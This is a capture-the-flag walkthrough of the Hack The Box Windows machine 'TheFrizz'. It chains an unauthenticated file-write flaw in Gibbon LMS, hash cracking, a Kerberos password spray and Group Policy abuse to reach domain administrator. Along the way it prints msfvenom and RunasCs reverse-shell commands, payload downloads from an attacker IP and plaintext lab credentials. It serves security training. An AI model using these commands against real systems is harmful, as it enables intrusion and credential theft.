HTB | TheFrizz

This is a Windows box. You can find it here

IP - 10.10.11.60

Nmap

└─$ nmap -sT -p- --min-rate 10000 10.10.11.60 -Pn -oA nmap_ports                                                                                                                                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 14:39 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
56383/tcp open  unknown
56387/tcp open  unknown
56397/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 54.76 seconds
└─$ nmap -sC -sV -p 22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,56383,56387,56397 10.10.11.60 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 14:41 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-07 16:11:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56383/tcp open  msrpc         Microsoft Windows RPC
56387/tcp open  msrpc         Microsoft Windows RPC
56397/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-07T16:12:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.22 seconds

Port 80

Let’s add frizzdc.frizz.htb to the hosts file

└─$ sudo echo "10.10.11.60 frizzdc.frizz.htb" | sudo tee -a /etc/hosts
[sudo] password for anurag: 
10.10.11.60 frizzdc.frizz.htb

website

Going through the website, we found the Gibbon LMS staff login page at http://frizzdc.frizz.htb/Gibbon-LMS/

Foothold/shell

CVE-2023-34598

We have found a **CVE-2023-34598** on the advisory page, and according to that Gibbon v25.0.0 is vulnerable to a Local File Inclusion

We have found a POC on MaddSec GitHub, and according to that

In order to exploit the vulnerability, an attacker would need to manipulate the "q" parameter to query a local file. This manipulation would cause the file to be included in the server's response. However, it's important to note that this exploit is only effective for files located within the installation folder and under specific conditions, which exclude PHP files, for instance.

Let’s try to exploit this, and for that, we will try gibbon.sql

There was no interesting information in there.

CVE-2023-45878

On looking for other exploits, we found CVE-2023-45878 and this GitHub exploit

GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).

Let’s clone the repo and try to exploit CVE-2023-45878

And we are able to run commands on the box.

shell as w.webservice

Now let’s try to get a shell.

We found the database credentials in config.php

MySql

We have found mysql.exe and we have the credentials. Let’s try to enumerate databases.

PS C:\xampp\mysql\bin> .\mysql.exe -u <USERNAME> -p"<Password>" -e "show databases;"
Database
gibbon
information_schema
test

List the tables in gibbon

PS C:\xampp\mysql\bin> .\mysql.exe -u <USERNAME> -p"<Password>" -e "show tables;" gibbon
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
<--SNIP-->

gibbonperson

<--SNIP-->
gibbonunitclassblock
gibbonunitoutcome
gibbonusernameformat
gibbonyeargroup

Display the gibbonperson table

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "use gibbon; SELECT * from gibbonperson;" -E
*************************** 1. row ***************************
           gibbonPersonID: 0000000001
                    title: Ms.
                  surname: Frizzle
                firstName: Fiona
            preferredName: Fiona
             officialName: Fiona Frizzle
         nameInCharacters: 
                   gender: Unspecified
                 username: f.frizzle
           passwordStrong: <PASSWORD>
       passwordStrongSalt: /<salt>
       passwordForceReset: N
                   status: Full
                 canLogin: Y
      gibbonRoleIDPrimary: 001
          gibbonRoleIDAll: 001
                      dob: NULL
                    email: f.frizzle@frizz.htb
           emailAlternate: NULL
                image_240: NULL
            lastIPAddress: ::1
            lastTimestamp: 2024-10-29 09:28:59
        lastFailIPAddress: NULL
        lastFailTimestamp: NULL
                failCount: 0

We have found a salt and a hashed password for Fiona Frizzle

shell as f.frizzle

The password looks like a SHA-256 hash, which GibbonCMS uses by default:

hash('sha256', $salt . $password)

So the logic is:

HASH = sha256(salt + password)

cracking password

We need to convert the hash and salt to a format that Hashcat understands.

  • Hash function: SHA256(salt + password)

  • Hashcat mode: 1420 → sha256($salt.$pass)

//format
<hash>:/<salt>

Let’s create a file (e.g., gibbon.hash) with this and run it with rockyou.txt

└─$ hashcat -m 1420 -a 0 f.frizzle.hash /home/anurag/stuff/rockyou.txt

And we have cracked the password
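As an added example (not part of the original write-up), here is the same salted-SHA-256 check written out in Python: it rebuilds the hashcat mode 1420 line from the gibbonperson columns and tests a wordlist offline, so the salt + password order can be confirmed before spending time in hashcat. The salt, hash and wordlist are constructed placeholders, not the box's real values.

```python
import hashlib
from typing import Iterable, Optional


def gibbon_hash(salt: str, password: str) -> str:
    """Gibbon's legacy scheme from the write-up: hash('sha256', $salt . $password).
    Salt first, then password: this is hashcat -m 1420 (sha256($salt.$pass)),
    not -m 1410 (sha256($pass.$salt)); swapping them never matches."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def hashcat_line(password_strong: str, password_strong_salt: str) -> str:
    """Build the '<hash>:<salt>' line hashcat -m 1420 expects from the two
    gibbonperson columns. The salt is used exactly as stored, leading '/' included."""
    return f"{password_strong}:{password_strong_salt}"


def crack(password_strong: str, password_strong_salt: str,
          wordlist: Iterable[str]) -> Optional[str]:
    """Offline check of candidate passwords against one gibbonperson row.
    Returns the matching candidate, or None when the wordlist is exhausted."""
    target = password_strong.lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")  # wordlist files carry newlines
        if gibbon_hash(password_strong_salt, candidate) == target:
            return candidate
    return None


# Constructed sample row: made-up salt and made-up password, so the hash is
# computed here rather than copied from the database dump.
SAMPLE_SALT = "/abcDEF123"
SAMPLE_HASH = gibbon_hash(SAMPLE_SALT, "Summer2024!")
SAMPLE_WORDLIST = ["password", "letmein", "Summer2024!", "frizzle"]

if __name__ == "__main__":
    print(hashcat_line(SAMPLE_HASH, SAMPLE_SALT))
    print("cracked:", crack(SAMPLE_HASH, SAMPLE_SALT, SAMPLE_WORDLIST))
```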

shell via tgt

Not able to validate the credentials via netexec smb and evil-winrm.

I have checked that the user exists (maybe the password was old?)

I can confirm the credentials using Kerbrute. The clock is synced with the DC first, since Nmap reported a 7h clock skew and Kerberos rejects requests outside its allowed time difference.

└─$ sudo ntpdate 10.10.11.60

└─$ ./kerbrute bruteuser --dc 10.10.11.60 -d frizz.htb pass.txt f.frizzle -v

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 05/08/25 - Ronnie Flathers @ropnop

2025/05/08 01:30:42 >  Using KDC(s):
2025/05/08 01:30:42 >   10.10.11.60:88

2025/05/08 01:30:43 >  [+] VALID LOGIN:  f.frizzle@frizz.htb:<PASSWORD>
2025/05/08 01:30:43 >  Done! Tested 1 logins (1 successes) in 0.555 seconds

So that means the credential is correct.

Since we have valid credentials, we can request a TGT and log in with that ticket

└─$ impacket-getTGT frizz.htb/'f.frizzle':'<PASSWORD>' -dc-ip 10.10.11.60  

└─$ export KRB5CCNAME=f.frizzle.ccache

└─$ klist

└─$ evil-winrm -i frizzdc.frizz.htb -k f.frizzle.ccache -r frizz.htb 

💡Don’t forget to add the below to /etc/krb5.conf

[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    forwardable = true
    
[realms]
FRIZZ.HTB = {
    kdc = frizzdc.frizz.htb
    admin_server = frizzdc.frizz.htb
}

[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB

Put only the above in the config file, then SSH in:

ssh f.frizzle@frizz.htb -K

And we found user.txt

Privilege Escalation

Bloodhound

Since we have valid credentials, we can use BloodHound to collect data and analyse further

└─$ bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60  -c all  --zip

After checking the privileges of all the users, we found that m.schoolbus has a lot of privileges.

shell as m.schoolbus

Nothing interesting was found via WinPEAS and PowerUp.

Let’s look for hidden files

PS C:\> ls -Force

We found some archive files in the Recycle Bin.

I tried many ways to copy, but none of them worked, in the end, I had to use Meterpreter.

  • Make a reverse TCP payload via msfvenom

  • Copy it to the Windows box

  • Start Meterpreter handler and execute that payload

  • Once we have Meterpreter shell, we can copy the file

└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=1234 -f exe -o payload.exe
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> Invoke-WebRequest -Uri "http://10.10.16.4/payload.exe" -outfile "payload.exe"
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 1234
run
meterpreter > download $IE2XMEG.7z
meterpreter > download $RE2XMEG.7z

I was able to extract $RE2XMEG.7z

Found some credentials:

└─$ grep -ri "password" wapt/conf 

It was base64 encoded, so I could decode it and get the clear-text password.

Let’s use Kerbrute to find the correct user name.

But first let’s get the list of usernames

PS C:\Users\f.frizzle> Get-ADUser -Filter * -Properties * | select name

name
----
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.Webservice

Now we can copy the list to users.txt and perform a password spray with Kerbrute

└─$ ./kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 users.txt '<PASSWORD>' -v

We found a match: M.SchoolBus

Let’s get a TGT the same way we did for f.frizzle

└─$ kinit M.SchoolBus@FRIZZ.HTB

└─$ klist         

└─$ ssh M.SchoolBus@10.10.11.60 -K

Administrator privilege

From the whoami /groups output, we know we are a member of frizz\Group Policy Creator Owners

This means we do have permission to create Group Policy Objects (GPOs) in the domain.

By default, members of the Group Policy Creator Owners can:

  • Create new GPOs

  • Edit or delete GPOs they created

GPO Abuse

Now we have to use SharpGPOAbuse to add ourselves to the local Administrators group, and for that, we need to

  • Create a GPO (TestGPO in the commands below).

  • Link it to the DOMAIN CONTROLLERS organizational unit in the FRIZZ.HTB domain.

  • Make sure the link is enabled so that the GPO takes effect on all objects within the OU (i.e., the domain controllers).

PS C:\Users\M.SchoolBus> New-GPO -Name "TestGPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId       : 416eb50f-4fda-41e6-9475-c7a9bedb6f07
DisplayName : TestGPO
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2

PS C:\Users\M.SchoolBus>

Now we have to download SharpGPOAbuse and execute it

PS C:\Users\M.SchoolBus> Invoke-WebRequest -uri "http://10.10.16.7/SharpGPOAbuse.exe" -outfile SharpGPOAbuse.exe

PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName TestGPO
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "TestGPO" is: {6A50C9A1-E986-42CF-BAB1-B96C4557E011}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{6A50C9A1-E986-42CF-BAB1-B96C4557E011}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\Users\M.SchoolBus>
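From a defender's side, the artefact this step leaves behind is the GptTmpl.inf written into SYSVOL above. The following added Python parser (not from the write-up or from SharpGPOAbuse) reads the [Group Membership] section of such a file and reports which SIDs a GPO would push into the local Administrators group (S-1-5-32-544); the sample file content and the member SID are constructed placeholders.

```python
import configparser
import re
from typing import Dict, List

LOCAL_ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

# Constructed sample of a Restricted Groups entry in GptTmpl.inf; the member
# SID is a placeholder, not the box's real value. A real file under
# \\<domain>\SysVol\...\SecEdit\GptTmpl.inf is UTF-16 LE ("Unicode=yes"),
# so read it with open(path, encoding="utf-16") before parsing.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1111111111-2222222222-3333333333-1106
"""


def parse_group_membership(inf_text: str) -> Dict[str, List[str]]:
    """Return {group: [members]} from the [Group Membership] section.
    Keys are the group part of '*<group>__Members'; values are the
    comma-separated members with the leading '*' (SID marker) stripped."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case instead of lowercasing SIDs/names
    cp.read_string(inf_text)
    result: Dict[str, List[str]] = {}
    if not cp.has_section("Group Membership"):
        return result
    for key, value in cp.items("Group Membership"):
        m = re.fullmatch(r"\*?(.+?)__Members", key.strip())
        if not m:
            continue  # '__Memberof' lines describe nesting, not who gets added
        members = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
        result[m.group(1)] = members
    return result


def find_admin_additions(inf_text: str) -> List[str]:
    """Members a GPO would place into the local Administrators group."""
    return parse_group_membership(inf_text).get(LOCAL_ADMINISTRATORS_SID, [])


if __name__ == "__main__":
    for sid in find_admin_additions(SAMPLE_GPTTMPL):
        print("GPO adds to local Administrators:", sid)
```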

Now, ideally, we need to log off and log back in for this to take effect (the new group membership only shows up in a fresh logon token), but in our case (since we are on HTB and it has multiple instances), we cannot do that.

So we will use RunasCs, because we get a permission denied when trying runas. RunasCs starts a new logon session with explicit credentials, so the process it spawns gets a fresh token that already includes the new local Administrators membership.

RunasCs is a utility to run specific processes with different permissions than the user's current logon provides, using explicit credentials. This tool is an improved and open version of the Windows built-in runas.exe.

// on the Windows box
PS C:\Users\M.SchoolBus> Invoke-WebRequest -uri "http://10.10.16.7/RunasCs.exe" -OutFile RunasCs.exe
PS C:\Users\M.SchoolBus> .\RunasCs.exe M.SchoolBus <PASSWORD> cmd.exe -r 10.10.16.7:1234

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-bd6f6$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2724 created in background.
PS C:\Users\M.SchoolBus>

// on our machine
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.60] 63289
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
frizz\m.schoolbus

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\Users\Administrator\Desktop

03/11/2025  04:14 PM    <DIR>          .
03/11/2025  03:37 PM    <DIR>          ..
02/25/2025  03:06 PM             2,083 cleanup.ps1
05/11/2025  08:42 AM                34 root.txt
               2 File(s)          2,117 bytes
               2 Dir(s)   2,085,539,840 bytes free

C:\Users\Administrator\Desktop>

And we have root.txt
